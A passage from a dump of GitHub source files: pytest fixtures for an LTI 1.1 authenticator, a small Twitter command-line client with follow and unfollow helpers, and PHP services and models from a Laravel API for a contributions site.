(n=42)\")\n plt.subplots_adjust(left=.3)\n \n for rect in rects:\n width = rect.get_width()\n ax.text(width+.5, rect.get_y()+rect.get_height()/2., '%d'%int(width),\n ha=\"left\", va=\"center\")\n\n plt.savefig(\"\".join([\"figs/528408904.png\"]))\n plt.close()\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 7 |
shurrey/ltiauthenticator
|
https://github.com/shurrey/ltiauthenticator
|
c769fa2f464026e5f95f8bbd1e32aba2ace2dc4c
|
87657e17480b7e776cfbfd9ba5404d7bd9cdf7aa
|
7c5cc73b6dd36be25e7c9b2f8b5570227860c031
|
refs/heads/master
| 2023-06-26T23:30:11.103573 | 2021-07-24T04:10:12 | 2021-07-24T04:10:12 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6777087450027466,
"alphanum_fraction": 0.7025535106658936,
"avg_line_length": 34.34146499633789,
"blob_id": "1609f55645708fe9ddf2bbf46c610104542d57c3",
"content_id": "4719200d2cf8041b3285b337249a642d772e7b8a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1449,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 41,
"path": "/tests/test_lti11_handlers.py",
"repo_name": "shurrey/ltiauthenticator",
"src_encoding": "UTF-8",
"text": "from unittest.mock import patch\n\nimport pytest\n\nfrom ltiauthenticator.lti11.handlers import LTI11AuthenticateHandler\n\n\[email protected]\nasync def test_lti_11_authenticate_handler_invokes_redirect_method(\n make_lti11_mock_request_handler,\n):\n \"\"\"\n Does the LTI11AuthenticateHandler call the redirect function?\n \"\"\"\n local_handler = make_lti11_mock_request_handler(LTI11AuthenticateHandler)\n with patch.object(\n LTI11AuthenticateHandler, \"redirect\", return_value=None\n ) as mock_redirect:\n with patch.object(LTI11AuthenticateHandler, \"login_user\", return_value=None):\n await LTI11AuthenticateHandler(\n local_handler.application, local_handler.request\n ).post()\n assert mock_redirect.called\n\n\[email protected]\nasync def test_lti_11_authenticate_handler_invokes_login_user_method(\n make_lti11_mock_request_handler,\n):\n \"\"\"\n Does the LTI11AuthenticateHandler call the login_user function?\n \"\"\"\n local_handler = make_lti11_mock_request_handler(LTI11AuthenticateHandler)\n with patch.object(LTI11AuthenticateHandler, \"redirect\", return_value=None):\n with patch.object(\n LTI11AuthenticateHandler, \"login_user\", return_value=None\n ) as mock_login_user:\n await LTI11AuthenticateHandler(\n local_handler.application, local_handler.request\n ).post()\n assert mock_login_user.called\n"
},
{
"alpha_fraction": 0.5528912544250488,
"alphanum_fraction": 0.5869665145874023,
"avg_line_length": 41.51707458496094,
"blob_id": "769bb8a74f954447fd6722246d722b7c4ba40120",
"content_id": "5daf4db7008be38f241031860cea081f88412e31",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8716,
"license_type": "permissive",
"max_line_length": 149,
"num_lines": 205,
"path": "/tests/conftest.py",
"repo_name": "shurrey/ltiauthenticator",
"src_encoding": "UTF-8",
"text": "import os\nimport secrets\nimport time\n\nfrom oauthlib.oauth1.rfc5849 import signature\n\nimport pytest\n\nfrom typing import Dict\n\nfrom tornado.web import Application\nfrom tornado.web import RequestHandler\nfrom tornado.httputil import HTTPServerRequest\n\nfrom unittest.mock import Mock\n\n\[email protected](scope=\"function\")\ndef user_model(username: str, **kwargs) -> dict:\n \"\"\"Return a user model\"\"\"\n user = {\n \"username\": username,\n \"auth_state\": {k: v for k, v in kwargs.items() if not k.startswith(\"oauth_\")},\n }\n user.update(kwargs)\n return user\n\n\[email protected](scope=\"function\")\ndef make_lti11_basic_launch_request_args() -> Dict[str, str]:\n def _make_lti11_basic_launch_args(\n roles: str = \"Instructor\",\n ext_roles: str = \"urn:lti:instrole:ims/lis/Instructor\",\n lms_vendor: str = \"canvas\",\n oauth_consumer_key: str = \"my_consumer_key\",\n oauth_consumer_secret: str = \"my_shared_secret\",\n ):\n oauth_timestamp = str(int(time.time()))\n oauth_nonce = secrets.token_urlsafe(32)\n args = {\n \"oauth_callback\": \"about:blank\",\n \"oauth_consumer_key\": oauth_consumer_key,\n \"oauth_timestamp\": str(int(oauth_timestamp)),\n \"oauth_nonce\": str(oauth_nonce),\n \"oauth_signature_method\": \"HMAC-SHA1\",\n \"oauth_version\": \"1.0\",\n \"context_id\": \"888efe72d4bbbdf90619353bb8ab5965ccbe9b3f\",\n \"context_label\": \"Introduction to Data Science\",\n \"context_title\": \"Introduction101\",\n \"course_lineitems\": \"https://canvas.instructure.com/api/lti/courses/1/line_items\",\n \"custom_canvas_assignment_title\": \"test-assignment\",\n \"custom_canvas_course_id\": \"616\",\n \"custom_canvas_enrollment_state\": \"active\",\n \"custom_canvas_user_id\": \"1091\",\n \"custom_canvas_user_login_id\": \"[email protected]\",\n \"ext_roles\": ext_roles,\n \"launch_presentation_document_target\": \"iframe\",\n \"launch_presentation_height\": \"1000\",\n \"launch_presentation_locale\": \"en\",\n \"launch_presentation_return_url\": \"https://canvas.instructure.com/courses/161/external_content/success/external_tool_redirect\",\n \"launch_presentation_width\": \"1000\",\n \"lis_outcome_service_url\": \"http://www.imsglobal.org/developers/LTI/test/v1p1/common/tool_consumer_outcome.php?b64=MTIzNDU6OjpzZWNyZXQ=\",\n \"lis_person_contact_email_primary\": \"[email protected]\",\n \"lis_person_name_family\": \"Bar\",\n \"lis_person_name_full\": \"Foo Bar\",\n \"lis_person_name_given\": \"Foo\",\n \"lti_message_type\": \"basic-lti-launch-request\",\n \"lis_result_sourcedid\": \"feb-123-456-2929::28883\",\n \"lti_version\": \"LTI-1p0\",\n \"resource_link_id\": \"888efe72d4bbbdf90619353bb8ab5965ccbe9b3f\",\n \"resource_link_title\": \"Test-Assignment\",\n \"roles\": roles,\n \"tool_consumer_info_product_family_code\": lms_vendor,\n \"tool_consumer_info_version\": \"cloud\",\n \"tool_consumer_instance_contact_email\": \"[email protected]\",\n \"tool_consumer_instance_guid\": \"srnuz6h1U8kOMmETzoqZTJiPWzbPXIYkAUnnAJ4u:test-lms\",\n \"tool_consumer_instance_name\": \"myedutool\",\n \"user_id\": \"185d6c59731a553009ca9b59ca3a885100000\",\n \"user_image\": \"https://lms.example.com/avatar-50.png\",\n }\n extra_args = {\"my_key\": \"this_value\"}\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n launch_url = \"http://jupyterhub/hub/lti/launch\"\n\n args.update(extra_args)\n\n base_string = signature.signature_base_string(\n \"POST\",\n signature.base_string_uri(launch_url),\n signature.normalize_parameters(\n signature.collect_parameters(body=args, headers=headers)\n ),\n )\n\n args[\"oauth_signature\"] = signature.sign_hmac_sha1(\n base_string, oauth_consumer_secret, None\n )\n return args\n\n return _make_lti11_basic_launch_args\n\n\[email protected](scope=\"function\")\ndef make_lti11_success_authentication_request_args():\n def _make_lti11_success_authentication_request_args(\n roles: str = \"Instructor\",\n ext_roles: str = \"urn:lti:instrole:ims/lis/Instructor\",\n lms_vendor: str = \"canvas\",\n oauth_consumer_key: str = \"my_consumer_key\",\n ):\n \"\"\"\n Return a valid request arguments make from LMS to our tool (when authentication steps were success)\n \"\"\"\n args = {\n \"oauth_callback\": [\"about:blank\".encode()],\n \"oauth_consumer_key\": [oauth_consumer_key.encode()],\n \"oauth_signature_method\": [\"HMAC-SHA1\".encode()],\n \"oauth_timestamp\": [\"1585947271\".encode()],\n \"oauth_nonce\": [\"01fy8HKIASKuD9gK9vWUcBj9fql1nOCWfOLPzeylsmg\".encode()],\n \"oauth_signature\": [\"abc123\".encode()],\n \"oauth_version\": [\"1.0\".encode()],\n \"context_id\": [\"888efe72d4bbbdf90619353bb8ab5965ccbe9b3f\".encode()],\n \"context_label\": [\"intro101\".encode()],\n \"context_title\": [\"intro101\".encode()],\n \"course_lineitems\": [\n \"my.platform.com/api/lti/courses/1/line_items\".encode()\n ],\n \"custom_canvas_assignment_title\": [\"test-assignment\".encode()],\n \"custom_canvas_course_id\": [\"616\".encode()],\n \"custom_canvas_enrollment_state\": [\"active\".encode()],\n \"custom_canvas_user_id\": [\"1091\".encode()],\n \"custom_canvas_user_login_id\": [\"[email protected]\".encode()],\n \"ext_roles\": [ext_roles.encode()],\n \"launch_presentation_document_target\": [\"iframe\".encode()],\n \"launch_presentation_height\": [\"1000\".encode()],\n \"launch_presentation_locale\": [\"en\".encode()],\n \"launch_presentation_return_url\": [\n \"https: //illumidesk.instructure.com/courses/161/external_content/success/external_tool_redirect\".encode()\n ],\n \"launch_presentation_width\": [\"1000\".encode()],\n \"lis_outcome_service_url\": [\n \"http://www.imsglobal.org/developers/LTI/test/v1p1/common/tool_consumer_outcome.php?b64=MTIzNDU6OjpzZWNyZXQ=\".encode()\n ],\n \"lis_person_contact_email_primary\": [\"[email protected]\".encode()],\n \"lis_person_name_family\": [\"Bar\".encode()],\n \"lis_person_name_full\": [\"Foo Bar\".encode()],\n \"lis_person_name_given\": [\"Foo\".encode()],\n \"lti_message_type\": [\"basic-lti-launch-request\".encode()],\n \"lis_result_sourcedid\": [\"feb-123-456-2929::28883\".encode()],\n \"lti_version\": [\"LTI-1p0\".encode()],\n \"resource_link_id\": [\"888efe72d4bbbdf90619353bb8ab5965ccbe9b3f\".encode()],\n \"resource_link_title\": [\"Test-Assignment-Another-LMS\".encode()],\n \"roles\": [roles.encode()],\n \"tool_consumer_info_product_family_code\": [lms_vendor.encode()],\n \"tool_consumer_info_version\": [\"cloud\".encode()],\n \"tool_consumer_instance_contact_email\": [\n \"[email protected]\".encode()\n ],\n \"tool_consumer_instance_guid\": [\n \"srnuz6h1U8kOMmETzoqZTJiPWzbPXIYkAUnnAJ4u:test-lms\".encode()\n ],\n \"tool_consumer_instance_name\": [\"myorg\".encode()],\n \"user_id\": [\"185d6c59731a553009ca9b59ca3a885100000\".encode()],\n \"user_image\": [\"https://lms.example.com/avatar-50.png\".encode()],\n }\n return args\n\n return _make_lti11_success_authentication_request_args\n\n\[email protected](scope=\"function\")\ndef make_lti11_mock_request_handler() -> RequestHandler:\n \"\"\"\n Sourced from https://github.com/jupyterhub/oauthenticator/blob/master/oauthenticator/tests/mocks.py\n \"\"\"\n\n def _make_lti11_mock_request_handler(\n handler: RequestHandler,\n uri: str = \"https://hub.example.com\",\n method: str = \"POST\",\n **settings: dict,\n ) -> RequestHandler:\n \"\"\"Instantiate a Handler in a mock application\"\"\"\n application = Application(\n hub=Mock(\n base_url=\"/hub/\",\n server=Mock(base_url=\"/hub/\"),\n ),\n cookie_secret=os.urandom(32),\n db=Mock(rollback=Mock(return_value=None)),\n **settings,\n )\n request = HTTPServerRequest(\n method=method,\n uri=uri,\n connection=Mock(),\n )\n handler = RequestHandler(\n application=application,\n request=request,\n )\n handler._transforms = []\n return handler\n\n return _make_lti11_mock_request_handler\n"
}
] | 2 |
minamorl/tw
|
https://github.com/minamorl/tw
|
5bbfff938e95c58ed00fa857d57bbc010d0065b3
|
4b657e13c02e6d125c856483e3d28aa24ac4dbef
|
e629066ce58c956256f089a87ea85bf8f884fca9
|
refs/heads/master
| 2016-09-08T01:55:24.753557 | 2016-02-16T18:27:01 | 2016-02-16T18:27:01 | 42,738,215 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6881252527236938,
"alphanum_fraction": 0.6894301772117615,
"avg_line_length": 33.05925750732422,
"blob_id": "679d7a2f7a98231c9836e1cee083be902db5669b",
"content_id": "cc644efb2a2a86e9fa6c66d869bbb849a8e0dac8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4598,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 135,
"path": "/flicktor/subcommands.py",
"repo_name": "minamorl/tw",
"src_encoding": "UTF-8",
"text": "import argparse\n\nfrom . import *\n\ndef subcommand_say(args):\n api().statuses_update(status=args.status)\n\n\ndef subcommand_log(args):\n screen_name = args.screen_name or api().account_verify_credentials()['screen_name']\n logs = api().statuses_user_timeline(screen_name=screen_name)\n for l in logs:\n print_tweet(l)\n\n\ndef subcommand_list(args):\n screen_name = args.screen_name or api().account_verify_credentials()['screen_name']\n logs = api().lists_statuses(count=args.count, slug=args.slug, owner_screen_name=screen_name)\n for l in logs:\n print_tweet(l)\n\n\ndef subcommand_reply(args):\n screen_name = args.screen_name or api().account_verify_credentials()['screen_name']\n logs = api().statuses_mentions_timeline(screen_name=screen_name)\n for l in logs:\n print_tweet(l)\n\n\ndef subcommand_reply(args):\n screen_name = args.screen_name or api().account_verify_credentials()['screen_name']\n logs = api().statuses_mentions_timeline(screen_name=screen_name)\n for l in logs:\n print_tweet(l)\n\n\ndef subcommand_stream(args):\n screen_name = args.screen_name or api().account_verify_credentials()['screen_name']\n for l in api().user_stream():\n if \"text\" in l:\n print_tweet(l)\n\n\ndef subcommand_remove(args):\n username = args.screen_name or api().account_verify_credentials()['screen_name']\n\n followers = api().followers_ids(screen_name=username)['ids']\n followings = api().friends_ids(screen_name=username)['ids']\n\n for user in (api().lookup(str(user) for user in followings if user not in followers)):\n r = api().friendships_destroy(user_id=user['id_str'])\n print(r)\n\n\ndef subcommand_dm(args):\n received_dm = list(api().direct_messages(count=args.count))\n sent_dm = list(api().direct_messages_sent(count=args.count))\n\n dms = sorted(received_dm + sent_dm, key=lambda dm: parse_datetime(dm[\"created_at\"]), reverse=True)\n\n for l in dms:\n print_direct_message(l)\n\n\ndef follow_user_recursively(api, username: str, limit: int):\n import time\n followings = api.friends_ids(screen_name=username)['ids']\n\n for user_id in followings[:limit]:\n\n print(api.friendships_create(user_id=user_id))\n time.sleep(2)\n\n\ndef subcommand_follow(args):\n\n api().friendships_create(screen_name=args.screen_name)\n if args.recursive:\n follow_user_recursively(api(), args.screen_name, int(args.count))\n\n\ndef subcommand_search(args):\n\n tweets = api().search_tweets(q=args.query, count=100).get(\"statuses\")\n for t in tweets:\n print(t.get(\"text\"))\n\n\n\ndef _argpaser():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n\n subparser_say = subparsers.add_parser('say')\n subparser_say.add_argument('status')\n subparser_say.set_defaults(func=subcommand_say)\n\n subparser_stream = subparsers.add_parser('stream')\n subparser_stream.add_argument('screen_name', nargs='*', default=None)\n subparser_stream.set_defaults(func=subcommand_stream)\n\n subparser_log = subparsers.add_parser('log')\n subparser_log.add_argument('screen_name', nargs='*', default=None)\n subparser_log.add_argument('-c', '--count', default=None)\n subparser_log.set_defaults(func=subcommand_log)\n\n subparser_dm = subparsers.add_parser('dm')\n subparser_dm.add_argument('-c', '--count', default=None)\n subparser_dm.set_defaults(func=subcommand_dm)\n\n subparser_list = subparsers.add_parser('list')\n subparser_list.add_argument('slug')\n subparser_list.add_argument('screen_name', nargs='*', default=None)\n subparser_list.add_argument('-c', '--count', default=None)\n subparser_list.set_defaults(func=subcommand_list)\n\n subparser_reply = subparsers.add_parser('reply')\n subparser_reply.add_argument('screen_name', nargs='*', default=None)\n subparser_reply.set_defaults(func=subcommand_reply)\n\n subparser_remove = subparsers.add_parser('remove')\n subparser_remove.add_argument('screen_name', nargs='*', default=None)\n subparser_remove.set_defaults(func=subcommand_remove)\n\n subparser_search = subparsers.add_parser('search')\n subparser_search.add_argument('query', nargs='*', default=None)\n subparser_search.set_defaults(func=subcommand_search)\n\n subparser_follow = subparsers.add_parser('follow')\n subparser_follow.add_argument('-R', '--recursive', action='store_true', default=False)\n subparser_follow.add_argument('-c', '--count', default=20)\n subparser_follow.add_argument('screen_name', nargs='*', default=None)\n subparser_follow.set_defaults(func=subcommand_follow)\n\n return parser\n"
},
{
"alpha_fraction": 0.5333333611488342,
"alphanum_fraction": 0.5404762029647827,
"avg_line_length": 20,
"blob_id": "a0a088cf87c464fefa0c930a6d8b345b9b47d971",
"content_id": "b50bc7fa71e04aa8d029604579dbcd3b793df056",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 20,
"path": "/setup.py",
"repo_name": "minamorl/tw",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\nsetup(\n name=\"flicktor\",\n version=\"0.0.1\",\n packages=find_packages(),\n entry_points={\n 'console_scripts': ['tw = flicktor.__main__:main']\n },\n author='minamorl',\n author_email='[email protected]',\n install_requires=[\n 'staccato',\n 'clint',\n 'python-dateutil',\n 'requests',\n 'requests-oauthlib',\n 'pytz'\n ],\n)\n"
},
{
"alpha_fraction": 0.538226306438446,
"alphanum_fraction": 0.538226306438446,
"avg_line_length": 16.210525512695312,
"blob_id": "24a05749781f2a5dee21fdeb2526bbad12277fc5",
"content_id": "9b44b697d09dd6f3521f837f8774c5765aea68e5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 327,
"license_type": "permissive",
"max_line_length": 36,
"num_lines": 19,
"path": "/flicktor/__main__.py",
"repo_name": "minamorl/tw",
"src_encoding": "UTF-8",
"text": "from flicktor import subcommands\n\n\ndef main():\n parser = subcommands._argpaser()\n args = parser.parse_args()\n try: \n if hasattr(args, \"func\"):\n args.func(args)\n else:\n parser.print_help()\n\n\n except KeyboardInterrupt:\n print(\"bye.\")\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6875,
"alphanum_fraction": 0.6883445978164673,
"avg_line_length": 30.13157844543457,
"blob_id": "64e20ba9aa839f866c4ee1a578ef63c7951dd04f",
"content_id": "d888bd7b828174b5e3f6bb9de6e6916925c79f71",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1184,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 38,
"path": "/flicktor/__init__.py",
"repo_name": "minamorl/tw",
"src_encoding": "UTF-8",
"text": "import functools\nimport configparser\nimport os\nimport argparse\nimport staccato\nimport clint\nimport datetime\nimport pytz\nimport dateutil.parser\n\n\ndef import_configurations(path):\n config = configparser.ConfigParser()\n config.read(os.path.expanduser(path))\n return config\n\n\ndef print_tweet(l):\n created_at = parse_datetime(l['created_at']).strftime('%Y-%m-%d %H:%M:%S')\n clint.textui.puts(clint.textui.colored.cyan(\"@{} - {}\".format(l['user']['screen_name'], created_at)))\n clint.textui.puts(\"{} - {} favs\".format(l['text'], l['favorite_count']))\n\n\ndef print_direct_message(l):\n clint.textui.puts(clint.textui.colored.cyan(\"@{} -> @{}\".format(l['sender']['screen_name'], l['recipient']['screen_name'])))\n clint.textui.puts(\"{}\".format(l['text']))\n\n\ndef parse_datetime(datetime_str):\n return dateutil.parser.parse(datetime_str).replace(tzinfo=pytz.utc).astimezone(pytz.timezone('Asia/Tokyo'))\n\n\[email protected]_cache()\ndef api():\n conf = import_configurations(\"~/.staccato.conf\")['OAuth1Settings']\n api = staccato.startup()\n api.auth(conf[\"CONSUMER_KEY\"], conf[\"CONSUMER_SECRET\"], conf[\"ACCESS_TOKEN_KEY\"], conf[\"ACCESS_TOKEN_SECRET\"])\n return api\n\n"
}
] | 4 |
hearing-voices-network/api
|
https://github.com/hearing-voices-network/api
|
ab51d5e4b74362a8290bb08006d22a738eba170c
|
c2f0f383984bd9aa05224263ea470f31f0bd04d4
|
32c913548cde253c3da6f0efc135ab4186a96e4d
|
refs/heads/master
| 2023-01-13T14:31:50.774977 | 2020-02-09T15:01:40 | 2020-02-09T15:01:40 | 186,593,639 | 0 | 0 |
MIT
| 2019-05-14T09:49:17 | 2020-02-09T15:04:13 | 2023-01-04T13:55:12 |
PHP
|
[
{
"alpha_fraction": 0.6782369017601013,
"alphanum_fraction": 0.6785123944282532,
"avg_line_length": 36.04081726074219,
"blob_id": "b5484ea8edd66f03d3a352166596b81f4aedab3f",
"content_id": "228d3130133cd3e85bec1b61d1d9cbc59f233c9b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3630,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 98,
"path": "/app/Listeners/ContributionEventSubscriber.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Listeners;\n\nuse App\\Events\\Contribution\\ContributionApproved;\nuse App\\Events\\Contribution\\ContributionCreated;\nuse App\\Events\\Contribution\\ContributionRejected;\nuse App\\Events\\Contribution\\ContributionUpdated;\nuse App\\Mail\\TemplateMail;\nuse App\\Models\\Setting;\nuse App\\VariableSubstitution\\Email\\Admin\\NewContributionSubstituter;\nuse App\\VariableSubstitution\\Email\\Admin\\UpdatedContributionSubstituter;\nuse App\\VariableSubstitution\\Email\\EndUser\\ContributionApprovedSubstituter;\nuse App\\VariableSubstitution\\Email\\EndUser\\ContributionRejectedSubstituter;\nuse Illuminate\\Support\\Arr;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass ContributionEventSubscriber extends EventSubscriber\n{\n /**\n * @return string[]\n */\n protected function mapping(): array\n {\n return [\n ContributionCreated::class => 'handleContributionCreated',\n ContributionUpdated::class => 'handleContributionUpdated',\n ContributionApproved::class => 'handleContributionApproved',\n ContributionRejected::class => 'handleContributionRejected',\n ];\n }\n\n /**\n * @param \\App\\Events\\Contribution\\ContributionCreated $event\n */\n public function handleContributionCreated(ContributionCreated $event): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $this->dispatch(new TemplateMail(\n Config::get('connecting_voices.admin_email'),\n Arr::get($emailContent, 'admin.new_contribution.subject'),\n Arr::get($emailContent, 'admin.new_contribution.body'),\n new NewContributionSubstituter($event->getContribution())\n ));\n }\n\n /**\n * @param \\App\\Events\\Contribution\\ContributionUpdated $event\n */\n public function handleContributionUpdated(ContributionUpdated $event): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $this->dispatch(new TemplateMail(\n Config::get('connecting_voices.admin_email'),\n Arr::get($emailContent, 'admin.updated_contribution.subject'),\n Arr::get($emailContent, 'admin.updated_contribution.body'),\n new UpdatedContributionSubstituter($event->getContribution())\n ));\n }\n\n /**\n * @param \\App\\Events\\Contribution\\ContributionApproved $event\n */\n public function handleContributionApproved(ContributionApproved $event): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $this->dispatch(new TemplateMail(\n $event->getContribution()->endUser->user->email,\n Arr::get($emailContent, 'end_user.contribution_approved.subject'),\n Arr::get($emailContent, 'end_user.contribution_approved.body'),\n new ContributionApprovedSubstituter($event->getContribution())\n ));\n }\n\n /**\n * @param \\App\\Events\\Contribution\\ContributionRejected $event\n */\n public function handleContributionRejected(ContributionRejected $event): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $this->dispatch(new TemplateMail(\n $event->getContribution()->endUser->user->email,\n Arr::get($emailContent, 'end_user.contribution_rejected.subject'),\n Arr::get($emailContent, 'end_user.contribution_rejected.body'),\n new ContributionRejectedSubstituter($event->getContribution())\n ));\n }\n}\n"
},
{
"alpha_fraction": 0.595061719417572,
"alphanum_fraction": 0.5953086614608765,
"avg_line_length": 27.928571701049805,
"blob_id": "127a185bb22bb4f04a9bbfd2bd93928dd4f3a810",
"content_id": "d073d4bbcbb8661fa6ce8bbe6a84a0e75ab4c5d6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4050,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 140,
"path": "/app/Services/ContributionService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\Contribution\\ContributionApproved;\nuse App\\Events\\Contribution\\ContributionCreated;\nuse App\\Events\\Contribution\\ContributionDeleted;\nuse App\\Events\\Contribution\\ContributionRejected;\nuse App\\Events\\Contribution\\ContributionUpdated;\nuse App\\Models\\Contribution;\nuse App\\Support\\Markdown;\nuse Illuminate\\Support\\Facades\\Date;\n\nclass ContributionService\n{\n /**\n * @var \\App\\Support\\Markdown\n */\n protected $markdown;\n\n /**\n * ContributionService constructor.\n *\n * @param \\App\\Support\\Markdown $markdown\n */\n public function __construct(Markdown $markdown)\n {\n $this->markdown = $markdown;\n }\n\n /**\n * @param array $data\n * @return \\App\\Models\\Contribution\n */\n public function create(array $data): Contribution\n {\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = Contribution::create([\n 'end_user_id' => $data['end_user_id'],\n 'content' => $this->markdown->sanitise($data['content']),\n 'status' => $data['status'],\n 'status_last_updated_at' => Date::now(),\n ]);\n\n $contribution->tags()->sync($data['tags']);\n\n event(new ContributionCreated($contribution));\n\n return $contribution;\n }\n\n /**\n * @param \\App\\Models\\Contribution $contribution\n * @param array $data\n * @return \\App\\Models\\Contribution\n */\n public function update(Contribution $contribution, array $data): Contribution\n {\n /*\n * The status logic goes as follows:\n * If the status is \"public\", then change it to \"in review\".\n * If the status is \"private\", then leave it as \"private\".\n * If the status is \"in review\", then leave it as \"in review\".\n * If the status is \"changes requested\", then change it to \"in review\".\n */\n $status = $data['status'] ?? $contribution->status;\n\n switch ($status) {\n case Contribution::STATUS_PUBLIC:\n case Contribution::STATUS_CHANGES_REQUESTED:\n $status = Contribution::STATUS_IN_REVIEW;\n break;\n }\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution->update([\n 'content' => $this->markdown->sanitise($data['content'] ?? $contribution->content),\n 'status' => $status,\n 'changes_requested' => null,\n 'status_last_updated_at' => Date::now(),\n ]);\n\n if (isset($data['tags'])) {\n $contribution->tags()->sync($data['tags']);\n }\n\n event(new ContributionUpdated($contribution));\n\n return $contribution;\n }\n\n /**\n * @param \\App\\Models\\Contribution $contribution\n * @throws \\Exception\n */\n public function delete(Contribution $contribution): void\n {\n $contribution->tags()->sync([]);\n $contribution->delete();\n\n event(new ContributionDeleted($contribution));\n }\n\n /**\n * @param \\App\\Models\\Contribution $contribution\n * @return \\App\\Models\\Contribution\n */\n public function approve(Contribution $contribution): Contribution\n {\n $contribution->update([\n 'status' => Contribution::STATUS_PUBLIC,\n 'changes_requested' => null,\n 'status_last_updated_at' => Date::now(),\n ]);\n\n event(new ContributionApproved($contribution));\n\n return $contribution;\n }\n\n /**\n * @param \\App\\Models\\Contribution $contribution\n * @param string $changesRequested\n * @return \\App\\Models\\Contribution\n */\n public function reject(Contribution $contribution, string $changesRequested): Contribution\n {\n $contribution->update([\n 'status' => Contribution::STATUS_CHANGES_REQUESTED,\n 'changes_requested' => $changesRequested,\n 'status_last_updated_at' => Date::now(),\n ]);\n\n event(new ContributionRejected($contribution));\n\n return $contribution;\n }\n}\n"
},
{
"alpha_fraction": 0.600923478603363,
"alphanum_fraction": 0.6015831232070923,
"avg_line_length": 21.294116973876953,
"blob_id": "93a8cb5290151d888781c5c1ca07f5a6faf91c6d",
"content_id": "d6d7985c02216149cb4c5506be494909b88a9905",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1516,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 68,
"path": "/app/Models/User.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Foundation\\Auth\\User as Authenticatable;\nuse Illuminate\\Database\\Eloquent\\SoftDeletes;\nuse Laravel\\Passport\\HasApiTokens;\n\nclass User extends Authenticatable\n{\n use Mutators\\UserMutators;\n use Relationships\\UserRelationships;\n use Scopes\\UserScopes;\n use HasApiTokens;\n use SoftDeletes;\n\n /**\n * The attributes that should be cast to native types.\n *\n * @var array\n */\n protected $casts = [\n 'email_verified_at' => 'datetime',\n 'created_at' => 'datetime',\n 'updated_at' => 'datetime',\n 'deleted_at' => 'datetime',\n ];\n\n /**\n * Send the password reset notification.\n *\n * @param string $token\n */\n public function sendPasswordResetNotification($token): void\n {\n $this->isAdmin()\n ? $this->admin->sendPasswordResetNotification($token)\n : $this->endUser->sendPasswordResetNotification($token);\n }\n\n /**\n * Send the email verification notification.\n */\n public function sendEmailVerificationNotification(): void\n {\n if ($this->isEndUser()) {\n $this->endUser->sendEmailVerificationNotification();\n }\n }\n\n /**\n * @return bool\n */\n public function isAdmin(): bool\n {\n return $this->admin !== null;\n }\n\n /**\n * @return bool\n */\n public function isEndUser(): bool\n {\n return $this->endUser !== null;\n }\n}\n"
},
{
"alpha_fraction": 0.5582472681999207,
"alphanum_fraction": 0.5600284934043884,
"avg_line_length": 20.9296875,
"blob_id": "f1a2812263af2288b6dd797655c2b0b7d4f10fd7",
"content_id": "ebaf1e9ec2f7e0c5763f2a455f8d396e8aa5b5b5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2807,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 128,
"path": "/app/Models/File.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
